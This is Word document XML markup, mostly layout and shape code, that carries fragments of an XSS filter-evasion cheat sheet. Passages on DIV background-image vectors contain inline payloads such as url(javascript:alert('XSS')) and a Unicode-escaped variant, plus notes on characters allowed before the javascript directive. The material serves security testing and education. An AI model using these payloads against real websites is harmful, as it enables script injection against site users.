                <v:shape id="Text Box 730" o:spid="_x0000_s1703" type="#_x0000_t202" style="position:absolute;left:1614;top:252;width:5128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lZqsIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhN2m6kKblajiCgMBrJaDx6fzbMN&#10;Ni+1ybT+9+Yg7Pjx/Z4vO1uLG7XeOFYwHCQgiAunDZcKDvn24wuED8gaa8ek4EEelove2xxT7e6c&#10;0W0fShFD2KeooAqhSaX0RUUW/cA1xJE7u9ZiiLAtpW7xHsNtLUdJMpEWDceGChtaV1Rc9n9WwerI&#10;2cZcd6ff7JyZPJ8m/DO5KPXe71YzEIG68C9+ub+1gs9xnB/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+Vmq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&lt;DIV</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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STYLE="background-image:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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url(javascript:alert('XSS'))"&gt;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b/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:spacing w:before="101"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>DIV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Background-image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Unicoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="130"/>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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been</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>modified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>slightly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obfuscate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URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>parameter.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original</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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Renaud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Lifchitz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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vulnerability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Hotmail:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="11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0764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112395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1280795" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="725" name="Group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0795" cy="116205"/>
                          <a:chOff x="1614" y="177"/>
                          <a:chExt cx="2017" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="726" name="Freeform 728"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="177"/>
                            <a:ext cx="2017" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3610 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 2017"/>
                              <a:gd name="T2" fmla="+- 0 359 177"/>
                              <a:gd name="T3" fmla="*/ 359 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 2017"/>
                              <a:gd name="T6" fmla="+- 0 359 177"/>
                              <a:gd name="T7" fmla="*/ 359 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 2017"/>
                              <a:gd name="T10" fmla="+- 0 359 177"/>
                              <a:gd name="T11" fmla="*/ 359 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 2017"/>
                              <a:gd name="T14" fmla="+- 0 338 177"/>
                              <a:gd name="T15" fmla="*/ 338 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 2017"/>
                              <a:gd name="T18" fmla="+- 0 335 177"/>
                              <a:gd name="T19" fmla="*/ 335 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 2017"/>
                              <a:gd name="T22" fmla="+- 0 198 177"/>
                              <a:gd name="T23" fmla="*/ 198 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 2017"/>
                              <a:gd name="T26" fmla="+- 0 177 177"/>
                              <a:gd name="T27" fmla="*/ 177 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3610 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 2017"/>
                              <a:gd name="T30" fmla="+- 0 177 177"/>
                              <a:gd name="T31" fmla="*/ 177 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3631 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 2017"/>
                              <a:gd name="T34" fmla="+- 0 198 177"/>
                              <a:gd name="T35" fmla="*/ 198 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3631 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 2017"/>
                              <a:gd name="T38" fmla="+- 0 338 177"/>
                              <a:gd name="T39" fmla="*/ 338 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3613 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 2017"/>
                              <a:gd name="T42" fmla="+- 0 359 177"/>
                              <a:gd name="T43" fmla="*/ 359 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3610 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 2017"/>
                              <a:gd name="T46" fmla="+- 0 359 177"/>
                              <a:gd name="T47" fmla="*/ 35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17" h="183">
                                <a:moveTo>
                                  <a:pt x="199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996" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2017" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2017" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1999" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="199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Text Box 72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77"/>
                            <a:ext cx="201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&lt;DIV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4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STYLE="background-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6" o:spid="_x0000_s1704" style="position:absolute;margin-left:80.7pt;margin-top:8.85pt;width:100.85pt;height:9.15pt;z-index:-15608832;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,177" coordsize="201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">
                <v:shape id="Freeform 728" o:spid="_x0000_s1705" style="position:absolute;left:1614;top:177;width:2017;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="201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C0Q8QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPUWvCMBSF3wf7D+EKe5uJMlQ6o8hgMPYgWv0Bl+ba&#10;lDU3XZPW9t8bQfDxcM75Dme9HVwtempD5VnDbKpAEBfeVFxqOJ++31cgQkQ2WHsmDSMF2G5eX9aY&#10;GX/lI/V5LEWCcMhQg42xyaQMhSWHYeob4uRdfOswJtmW0rR4TXBXy7lSC+mw4rRgsaEvS8Vf3jkN&#10;+278P6lZ3fWX39za/iNfqcOo9dtk2H2CiDTEZ/jR/jEalvMF3M+kIy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gtEPEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1996,182l21,182r-3,l,161r,-3l,21,21,,1996,r21,21l2017,161r-18,21l1996,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1996,359;21,359;18,359;0,338;0,335;0,198;21,177;1996,177;2017,198;2017,338;1999,359;1996,359" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 727" o:spid="_x0000_s1706" type="#_x0000_t202" style="position:absolute;left:1614;top:177;width:201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lXA8YA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvZlNPahN3YiUFgqCGNNDj6/Z&#10;Z7Ik+zbNbjX+e1cQehxm5htmtR5tJ040eONYwXOSgiCunDZcK/gqP6ZLED4ga+wck4ILeVjnD5MV&#10;ZtqduaDTIdQiQthnqKAJoc+k9FVDFn3ieuLoHd1gMUQ51FIPeI5w28lZms6lRcNxocGe3hqq2sOf&#10;VbD55uLd/O5+9sWxMGX5kvJ23ir19DhuXkEEGsN/+N7+1AoWswXczsQj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lXA8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&lt;DIV</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="44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STYLE="background-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7"/>
        <w:rPr>
          <w:sz w:val="3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5563235" cy="116205"/>
                <wp:effectExtent l="5715" t="3175" r="3175" b="4445"/>
                <wp:docPr id="722" name="Group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3235" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8761" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="723" name="Freeform 72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custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 8761"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 8761"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 8761"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 8761"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 8761"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 8761"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 8742 w 8761"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 8739 w 8761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761" h="183">
                                <a:moveTo>
                                  <a:pt x="873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739" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8742" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="87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Text Box 72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image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\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23" o:spid="_x0000_s1707" style="width:438.05pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="876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">
                <v:shape id="Freeform 725" o:spid="_x0000_s1708" style="position:absolute;width:8761;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="876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utHsIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPUWvCQBCE3wv+h2MF3+pFLVWip6gg+FTa6A9YcmsS&#10;zO4duVPjv/cKhT4OM/MNs9r03Ko7daFxYmAyzkCRlM42Uhk4nw7vC1AholhsnZCBJwXYrAdvK8yt&#10;e8gP3YtYqQSRkKOBOkafax3KmhjD2HmS5F1cxxiT7CptO3wkOLd6mmWfmrGRtFCjp31N5bW4sQHt&#10;PX+XH7uMq9mVL0X4as4HMmY07LdLUJH6+B/+ax+tgfl0Br9n0hH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K60ewgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m8739,182l21,182r-3,l,161r,-3l,21,21,,8739,r21,21l8760,161r-18,21l8739,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8739,182;21,182;18,182;0,161;0,158;0,21;21,0;8739,0;8760,21;8760,161;8742,182;8739,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 724" o:spid="_x0000_s1709" type="#_x0000_t202" style="position:absolute;width:876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vJdM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5Z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xvJdM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image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\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2"/>
        <w:rPr>
          <w:sz w:val="7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2561590" cy="116205"/>
                <wp:effectExtent l="5715" t="1905" r="4445" b="5715"/>
                <wp:docPr id="719" name="Group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1590" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4034" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="720" name="Freeform 7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034" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 4013 w 4034"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 4034"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 4034"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 4034"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 4034"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 4034"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 4034"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 4013 w 4034"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 4034 w 4034"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 4034 w 4034"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 4016 w 4034"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 4013 w 4034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034" h="183">
                                <a:moveTo>
                                  <a:pt x="401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013" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4034" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4034" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4016" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="401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Text Box 7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3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0074\0028.1027\0058.1053\0053\0027\0029'\0029"&gt;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20" o:spid="_x0000_s1710" style="width:201.7pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="403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">
                <v:shape id="Freeform 722" o:spid="_x0000_s1711" style="position:absolute;width:4034;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="403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tZ2bwA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPyQrCMBC9C/5DGMGbpnpQqUYRF9Sb631oxrbYTGoT&#10;bf17cxA8Pt4+WzSmEG+qXG5ZwaAfgSBOrM45VXC9bHsTEM4jaywsk4IPOVjM260ZxtrWfKL32aci&#10;hLCLUUHmfRlL6ZKMDLq+LYkDd7eVQR9glUpdYR3CTSGHUTSSBnMODRmWtMooeZxfRsF6fT3dyNTL&#10;53G3t95sRvfogEp1O81yCsJT4//in3uvFYyHYX44E46AnH8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n+1nZvAAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93bnJldi54&#10;bWxQSwUGAAAAAAQABAD1AAAAgQMAAAAA&#10;" path="m4013,182l21,182r-3,l,161r,-3l,21,21,,4013,r21,21l4034,161r-18,21l4013,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4013,182;21,182;18,182;0,161;0,158;0,21;21,0;4013,0;4034,21;4034,161;4016,182;4013,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 721" o:spid="_x0000_s1712" type="#_x0000_t202" style="position:absolute;width:403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xq7M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3idTeH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Grs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0074\0028.1027\0058.1053\0053\0027\0029'\0029"&gt;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3"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk4"/>
        <w:spacing w:before="102"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>DIV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Background-image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Plus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Extra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Characters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="326" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="219"/>
      </w:pPr>
      <w:r>
        <w:t>Rnaske</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>built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quick</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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fuzzer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detect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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erroneous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>characters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allowed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>after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open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>parenthesis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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before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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>directive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IE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Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>8.1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secure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mode.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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decimal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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hex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add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>padding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course.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(Any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chars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used:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>1-32,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>34,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>39,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>160,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>8192-8.13,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>12288,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>65279):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="12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0918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116205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3310255" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="716" name="Group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10255" cy="116205"/>
                          <a:chOff x="1614" y="183"/>
                          <a:chExt cx="5213" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="717" name="Freeform 719"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="183"/>
                            <a:ext cx="5213" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6806 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 5213"/>
                              <a:gd name="T2" fmla="+- 0 365 183"/>
                              <a:gd name="T3" fmla="*/ 365 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 5213"/>
                              <a:gd name="T6" fmla="+- 0 365 183"/>
                              <a:gd name="T7" fmla="*/ 365 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 5213"/>
                              <a:gd name="T10" fmla="+- 0 365 183"/>
                              <a:gd name="T11" fmla="*/ 365 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 5213"/>
                              <a:gd name="T14" fmla="+- 0 344 183"/>
                              <a:gd name="T15" fmla="*/ 344 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 5213"/>
                              <a:gd name="T18" fmla="+- 0 341 183"/>
                              <a:gd name="T19" fmla="*/ 341 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 5213"/>
                              <a:gd name="T22" fmla="+- 0 204 183"/>
                              <a:gd name="T23" fmla="*/ 204 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 5213"/>
                              <a:gd name="T26" fmla="+- 0 183 183"/>
                              <a:gd name="T27" fmla="*/ 183 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6806 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 5213"/>
                              <a:gd name="T30" fmla="+- 0 183 183"/>
                              <a:gd name="T31" fmla="*/ 183 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6827 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 5213"/>
                              <a:gd name="T34" fmla="+- 0 204 183"/>
                              <a:gd name="T35" fmla="*/ 204 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6827 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 5213"/>
                              <a:gd name="T38" fmla="+- 0 344 183"/>
                              <a:gd name="T39" fmla="*/ 344 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6809 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 5213"/>
                              <a:gd name="T42" fmla="+- 0 365 183"/>
                              <a:gd name="T43" fmla="*/ 365 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6806 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 5213"/>
